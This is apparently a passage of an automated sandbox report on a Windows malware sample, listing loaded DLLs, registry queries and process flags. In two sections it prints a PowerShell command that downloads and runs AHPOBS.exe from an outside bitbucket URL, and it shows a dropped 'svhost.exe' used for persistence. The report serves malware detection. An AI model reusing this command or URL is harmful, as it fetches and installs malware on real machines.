              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Gq48hjKhZf.exeStatic PE information: Image base 0x140000000 > 0x60000000

              Data Obfuscation

              barindex
              Suspicious powershell command line found
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";Jump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeCode function: 0_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,0_2_000000014000D9C4
              Source: svhost.exe.10.drStatic PE information: real checksum: 0xa961f should be: 0x120549
              Source: AHPOBS.exe.6.drStatic PE information: real checksum: 0xa961f should be: 0x120549
              Source: Gq48hjKhZf.exeStatic PE information: real checksum: 0x0 should be: 0x1e610
              Source: Gq48hjKhZf.exeStatic PE information: section name: .code
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeCode function: 0_2_000000014001BD3E push rbx; ret 0_2_000000014001BD3F
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_00416CB5 push ecx; ret 10_2_00416CC8

              Persistence and Installation Behavior

              barindex
              Tries to download and execute files (via powershell)
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\AHPOBS.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeFile created: C:\Users\user\AppData\Roaming\Windata\svhost.exeJump to dropped file

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_0047A330
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_00434418
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
